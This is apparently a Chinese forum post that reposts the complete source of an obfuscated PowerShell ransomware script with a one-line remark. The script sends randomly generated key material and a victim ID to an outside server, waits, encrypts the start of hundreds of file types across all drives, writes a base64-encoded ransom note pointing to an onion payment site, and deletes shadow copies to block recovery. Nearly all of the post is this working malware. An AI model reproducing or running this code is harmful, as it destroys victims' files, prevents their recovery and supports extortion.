本帖最后由 B100D1E55 于 2017-7-11 08:39 编辑
真实诚……sleep了很久才开始加密
[mw_shl_code=javascript,true]$GhxRgshjdYhjcxRGH = "HKCU:\Software\ENCRDEC\Scripts"
$DghxjcTyahjscYUUajjs = "Version"
if((Test-Path $GhxRgshjdYhjcxRGH) -eq $true)
{exit}
else
{
New-Item -Path $GhxRgshjdYhjcxRGH -Force | Out-Null
New-ItemProperty -Path $GhxRgshjdYhjcxRGH -Name $DghxjcTyahjscYUUajjs -Value "0" `
-PropertyType DWORD -Force | Out-Null}
$756381442010295 = ([chaR[]](geT-RAnDOM -inpUT $(48..57 + 65..90 + 97..122) -CoUnT 49)) -jOIN ""
$467346782779685 = ([Char[]](geT-raNDOm -iNPut $(48..57 + 65..90 + 97..122) -coUNt 19)) -Join ""
$082171092508287 = ([cHaR[]](geT-RanDom -INPut $(48..57 + 65..90 + 97..122) -COuNt 24)) -join ""
$926225742886527 = "http://joelosteel.gdn/pi.php"
$910827030402006 = "string=$756381442010295&string2=$467346782779685&uuid=$082171092508287"
$289766261002010 = nEw-OBjECT -coMOBJeCT MSxMl2.Xmlhttp
$289766261002010.oPen('PoST', $926225742886527, $faLse)
$289766261002010.sEtRequestHeader("c"+"oNTENt-TYPE","AppLIcatIoN/X-wwW-fOrM-URL"+"EnCOdeD")
$289766261002010.setReQuestHeaDer("c"+"ontENT-LengTH", $post.length)
$289766261002010.SetRequeStHeader("cONneCtiOn", "clOSe")
$289766261002010.SeNd($910827030402006)
Start-Sleep -Seconds 120
[BytE[]]$34623746238743278432462378462378=[SysTem.tExt.EnCODInG]::UniCode.GetBYtes($756381442010295)
$JGDSDVNIUTGHBQSDGBHHFERFV = [Text.Encoding]::UTF8.GetBytes($467346782779685)
$hxTgshcYjsjdRgshxjThjsjdJ = new-ObjeCt System.SecuRity.Cryptography.RijndaelMaNaged
$hxTgshcYjsjdRgshxjThjsjdJ.Key = (new-Object Security.CryPtography.RFc2898DeriveBytes $756381442010295, $JGDSDVNIUTGHBQSDGBHHFERFV, 5).GetBytes(32)
$hxTgshcYjsjdRgshxjThjsjdJ.IV = (neW-Object Security.Cryptography.ShA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("alle") )[0..15]
$hxTgshcYjsjdRgshxjThjsjdJ.Padding="ZeRos"
$hxTgshcYjsjdRgshxjThjsjdJ.Mode="CBC"
$IjhxRgsaghdWdsagdUjjsncRFhgshd= gDr|where {$_.Free}|Sort-Object -Descending
foreach($bGgxjhxRfshdjcTghajsichGhshjdj in $IjhxRgsaghdWdsagdUjjsncRFhgshd){
gci $bGgxjhxRfshdjcTghajsichGhshjdj.root -RecursE -InClude "*.yuv","*.ycbcra","*.xis","*.x3f","*.x11","*.wpd","*.tex","*.sxg","*.stx","*.st8","*.st5","*.srw","*.srf","*.sr2","*.sqlitedb","*.sqlite3","*.sqlite","*.sdf","*.sda","*.sd0","*.s3db","*.rwz","*.rwl","*.rdb","*.rat","*.raf","*.qby","*.qbx","*.qbw","*.qbr","*.qba","*.py","*.psafe3","*.plc","*.plus_muhd","*.pdd","*.p7c","*.p7b","*.oth","*.orf","*.odm","*.odf","*.nyf","*.nxl","*.nx2","*.nwb","*.ns4","*.ns3","*.ns2","*.nrw","*.nop","*.nk2","*.nef","*.ndd","*.myd","*.mrw","*.moneywell","*.mny","*.mmw","*.mfw","*.mef","*.mdc","*.lua","*.kpdx","*.kdc","*.kdbx","*.kc2","*.jpe","*.incpas","*.iiq","*.ibz","*.ibank","*.hbk","*.gry","*.grey","*.gray","*.fhd","*.fh","*.ffd","*.exf","*.erf","*.erbsql","*.eml","*.dxg","*.drf","*.dng","*.dgc","*.des","*.der","*.ddrw","*.ddoc","*.dcs","*.dc2","*.db_journal","*.csl","*.csh","*.crw","*.craw","*.cib","*.ce2","*.ce1","*.cdrw","*.cdr6","*.cdr5","*.cdr4","*.cdr3","*.bpw","*.bgt","*.bdb","*.bay","*.bank","*.backupdb","*.backup","*.back","*.awg","*.apj","*.ait","*.agdl","*.ads","*.adb","*.acr","*.ach","*.accdt","*.accdr","*.accde","*.ab4","*.3pr","*.3fr","*.vmxf","*.vmsd","*.vhdx","*.vhd","*.vbox","*.stm","*.st7","*.rvt","*.qcow","*.qed","*.pif","*.pdb","*.pab","*.ost","*.ogg","*.nvram","*.ndf","*.m4p","*.m2ts","*.log","*.hpp","*.hdd","*.groups","*.flvv","*.edb","*.dit","*.dat","*.cmt","*.bin","*.aiff","*.xlk","*.wad","*.tlg","*.st6","*.st4","*.say","*.sas7bdat","*.qbm","*.qbb","*.ptx","*.pfx","*.pef","*.pat","*.oil","*.odc","*.nsh","*.nsg","*.nsf","*.nsd","*.nd","*.mos","*.indd","*.iif","*.fpx","*.fff","*.fdb","*.dtd","*.design","*.ddd","*.dcr","*.dac","*.cr2","*.cdx","*.cdf","*.blend","*.bkp","*.al","*.adp","*.act","*.xlr","*.xlam","*.xla","*.wps","*.tga","*.rw2","*.r3d","*.pspimage","*.ps","*.pct","*.pcd","*.m4v","*.fxg","*.flac","*.eps","*.dxb","*.drw","*.dot","*.db3","*.cpi","*.cls","*.cdr","*.arw","*.ai","*.aac","*.thm","*.srt","*.save","*.safe","*.rm","*.pwm","*.pages","*.obj","*.mlb","*.md","*.mbx","*.lit","*.laccdb","*.kwm","*.idx","*.html","*.flf","*.dxf","*.dwg","*.dds","*.csv","*.css","*.config","*.cfg","*.cer","*.asx","*.aspx","*.aoi","*.accdb","*.7zip","*.1cd","*.xls","*.wab","*.rtf","*.prf","*.ppt","*.oab","*.msg","*.mapimail","*.jnt","*.doc","*.dbx","*.contact","*.n64","*.m4a","*.m4u","*.m3u","*.mid","*.wma","*.flv","*.3g2","*.mkv","*.3gp","*.mp4","*.mov","*.avi","*.asf","*.mpeg","*.vob","*.mpg","*.wmv","*.fla","*.swf","*.wav","*.mp3","*.qcow2","*.vdi","*.vmdk","*.vmx","*.wallet","*.upk","*.sav","*.re4","*.ltx","*.litesql","*.litemod","*.lbf","*.iwi","*.forge","*.das","*.d3dbsp","*.bsa","*.bik","*.asset","*.apk","*.gpg","*.aes","*.ARC","*.PAQ","*.tar.bz2","*.tbk","*.bak","*.tar","*.tgz","*.gz","*.7z","*.rar","*.zip","*.djv","*.djvu","*.svg","*.bmp","*.png","*.gif","*.raw","*.cgm","*.jpeg","*.jpg","*.tif","*.tiff","*.NEF","*.psd","*.cmd","*.bat","*.sh","*.class","*.jar","*.java","*.rb","*.asp","*.cs","*.brd","*.sch","*.dch","*.dip","*.pl","*.vbs","*.vb","*.js","*.asm","*.pas","*.cpp","*.php","*.ldf","*.mdf","*.ibd","*.MYI","*.MYD","*.frm","*.odb","*.dbf","*.db","*.mdb","*.sql","*.SQLITEDB","*.SQLITE3","*.011","*.010","*.009","*.008","*.007","*.006","*.005","*.004","*.003","*.002","*.001","*.pst","*.onetoc2","*.asc","*.lay6","*.lay","*.ms11","*.sldm","*.sldx","*.ppsm","*.ppsx","*.ppam","*.docb","*.mml","*.sxm","*.otg","*.odg","*.uop","*.potx","*.potm","*.pptx","*.pptm","*.std","*.sxd","*.pot","*.pps","*.sti","*.sxi","*.otp","*.odp","*.wb2","*.123","*.wks","*.wk1","*.xltx","*.xltm","*.xlsx","*.xlsm","*.xlsb","*.slk","*.xlw","*.xlt","*.xlm","*.xlc","*.dif","*.stc","*.sxc","*.ots","*.ods","*.hwp","*.602","*.dotm","*.dotx","*.docm","*.docx","*.DOT","*.3dm","*.max","*.3ds","*.xml","*.txt","*.CSV","*.uot","*.RTF","*.pdf","*.XLS","*.PPT","*.stw","*.sxw","*.ott","*.odt","*.DOC","*.pem","*.p12","*.csr","*.crt","*.key"|%{
try{
$sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh = New-Object SyStem.IO.BinaryReader([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
if ($sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.BaseStream.Length -lt 4096){
$hxTgashdnUjuwjdcTgshdnRfgshd = $sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.BaseStream.Length
}
else
{
$hxTgashdnUjuwjdcTgshdnRfgshd = 4096
}
$34623746238743278432462378462378 = $sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.ReadByTes($hxTgashdnUjuwjdcTgshdnRfgshd)
$sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.Close()
$xYhsjcRtsghhIIIahdhHshIOKKJ = $hxTgshcYjsjdRgshxjThjsjdJ.CreateEncRyPtor()
$YhchcRgsghxYhshdcThgh = new-Object IO.MemoryStream
$GshshdTgshxJuahxthH = new-Object Security.Cryptography.CryptoStream $YhchcRgsghxYhshdcThgh,$xYhsjcRtsghhIIIahdhHshIOKKJ,"Write"
$GshshdTgshxJuahxthH.Write($34623746238743278432462378462378, 0,$34623746238743278432462378462378.Length)
$GshshdTgshxJuahxthH.Close()
$YhchcRgsghxYhshdcThgh.Close()
$xYhsjcRtsghhIIIahdhHshIOKKJ.Clear()
$IjxmxRgshhdYHhajhxRtasghhdI = $YhchcRgsghxYhshdcThgh.ToArray()
$OlskcTshcUjsmcTgshdjJJ = New-Object System.IO.BinaryWriter([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
$OlskcTshcUjsmcTgshdjJJ.Write($IjxmxRgshhdYHhajhxRtasghhdI,0,$IjxmxRgshhdYHhajhxRtasghhdI.Length)
$OlskcTshcUjsmcTgshdjJJ.Close()
$bcyHsjhjxRtgahdhPoajndcTghshcJJ = $_.Directory.ToString() + '\_README-Encrypted-Files.html'
$OkxxRtgshYHjsjcUjajxYhshjc = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("PGZvbnQgZmFjZT0ibW9ub3NwYWNlIj48aDE+ISEhIElNUE9SVEFOVCBJTkZPUk1BVElPTiAhISEhPC9oMT48YnI+DQoNCkFsbCBvZiB5b3VyIGZpbGVzIGFyZSBlbmNyeXB0ZWQgd2l0aCBSU0EtMjA0OCBhbmQgQUVTLTEyOCBjaXBoZXJzLjxicj4NCk1vcmUgaW5mb3JtYXRpb24gYWJvdXQgdGhlIFJTQSBhbmQgQUVTIGNhbiBiZSBmb3VuZCBoZXJlOjxicj4NCjxhIGhyZWY9Imh0dHA6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvUlNBXyhjcnlwdG9zeXN0ZW0pIj5odHRwOi8vZW4ud2lraXBlZGlhLm9yZy93aWtpL1JTQV8oY3J5cHRvc3lzdGVtKTwvYT48YnI+DQo8YSBocmVmPSJodHRwOi8vZW4ud2lraXBlZGlhLm9yZy93aWtpL0FkdmFuY2VkX0VuY3J5cHRpb25fU3RhbmRhcmQiPmh0dHA6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvQWR2YW5jZWRfRW5jcnlwdGlvbl9TdGFuZGFyZDwvYT48YnI+DQogICANCjxwPkRlY3J5cHRpbmcgb2YgeW91ciBmaWxlcyBpcyBPTkxZIHBvc3NpYmxlIHdpdGggdGhlIHByaXZhdGUga2V5IGFuZCBkZWNyeXB0IHByb2dyYW0sIHdoaWNoIGlzIG9uIG91ciBzZWNyZXQgc2VydmVyLjxicj4NCg0KVG8gcmVjZWl2ZSB5b3VyIHByaXZhdGUga2V5IGZvbGxvdyB0aGlzIGxpbms6PGJyPg0KDQoxLiA8YSBocmVmPSJodHRwOi8vNXp6Zmh6ZnRzcGFkbGdqZS5vbmlvbi50byI+aHR0cDovLzV6emZoemZ0c3BhZGxnamUub25pb24udG88L2E+PGJyPg0KDQo8cD5JZiB0aGUgYWRkcmVzcyBpcyBub3QgYXZhaWxhYmxlLCBmb2xsb3cgdGhlc2Ugc3RlcHM6PGJyPg0KMS4gRG93bmxvYWQgYW5kIGluc3RhbGwgVG9yIEJyb3dzZXI6IDxhIGhyZWY9Imh0dHBzOi8vd3d3LnRvcnByb2plY3Qub3JnL2Rvd25sb2FkL2Rvd25sb2FkLWVhc3kuaHRtbCI+aHR0cHM6Ly93d3cudG9ycHJvamVjdC5vcmcvZG93bmxvYWQvZG93bmxvYWQtZWFzeS5odG1sPC9hPjxicj4NCjIuIEFmdGVyIGEgc3VjY2Vzc2Z1bCBpbnN0YWxsYXRpb24sIHJ1biB0aGUgYnJvd3NlciBhbmQgd2FpdCBmb3IgaW5pdGlhbGl6YXRpb24uPGJyPg0KMy4gVHlwZSBpbiB0aGUgYWRkcmVzcyBiYXI6IDV6emZoemZ0c3BhZGxnamUub25pb248YnI+DQo0LiBGb2xsb3cgdGhlIGluc3RydWN0aW9ucyBvbiB0aGUgc2l0ZS48YnI+PC9mb250Pg=="));
if(!(Test-path($bcyHsjhjxRtgahdhPoajndcTghshcJJ))){
New-IteM -Path $bcyHsjhjxRtgahdhPoajndcTghshcJJ -ItemTyPe file -Value $OkxxRtgshYHjsjcUjajxYhshjc
AdD-Content -PAth $bcyHsjhjxRtgahdhPoajndcTghshcJJ -VaLue ("<p><font face'monospace'><h1>!!! Your Personal identification ID: $082171092508287</p></font></h1>")
}}
catch
{
}
}}
$2885456708 = Get-WmiObjEct Win32_ShadoWCopy
ForEach($019384882892 in $2885456708) {
$019384882892.Delete()
}
exit[/mw_shl_code] |